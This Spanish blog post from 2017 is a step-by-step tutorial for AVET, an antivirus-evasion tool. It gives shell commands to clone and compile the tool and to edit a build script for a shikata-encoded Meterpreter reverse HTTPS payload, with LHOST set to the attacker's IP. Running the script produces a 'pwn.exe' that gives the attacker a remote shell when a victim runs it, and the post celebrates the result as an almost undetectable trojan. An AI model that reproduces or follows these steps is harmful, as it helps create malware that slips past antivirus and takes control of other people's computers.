jueves, 30 de marzo de 2017

AntiVirus Evasion Tool: AVET

Definicion:

AVET es una herramienta para evadir antivirus, fué desarrollada para hacer la vida más fácil a los pentesters y para experimentar con tecnicas de evasión antivirus.
Para más información: https://github.com/govolution/avet

 

Requisitos:

Descargar TDM-GCC
# wine tdm64-gcc-5.1.0-2.exe
* Instalación simple todo siguiente

 

PoC:

Descargamos el repositorio y entramos en la carpeta.

$ git clone https://github.com/govolution/avet
$ cd avet

Compilamos el make_avet con:

$ gcc -o make_avet make_avet.c

Editamos el archivo build_win32_meterpreter_rev_https_20xshikata.sh con el comando:

$ nano build/build_win32_meterpreter_rev_https_20xshikata.sh

Y cambiamos el LHOST del payload hecho por msfvenom, por nuestra IP Local, y ejecutamos el script:

$ ./build/build_win32_meterpreter_rev_https_20xshikata.sh

Nos generará un pwn.exe el cual al ejecutarlo en un equipo victima nos devolverá la shell meterpreter.


 Esta es la forma más automática de hacerlo, en el proyecto de github tenéis ejemplos con más maneras, además de contar con una mini-tool para facilitar todo el proceso llamada avet_fabric.py, así que ya estáis tardando en entrar. https://github.com/govolution/avet
Como podemos ver el escaneo hecho por nodistribute contamos con un troyano casi indetectable:


Muchas gracias por ver esta entrada, comenta lo que te ha parecido o si tienes alguna duda y nos vemos el la próxima entrada.

Lectura recomendada
Previous Post
Next Post

post written by:

0 comentarios: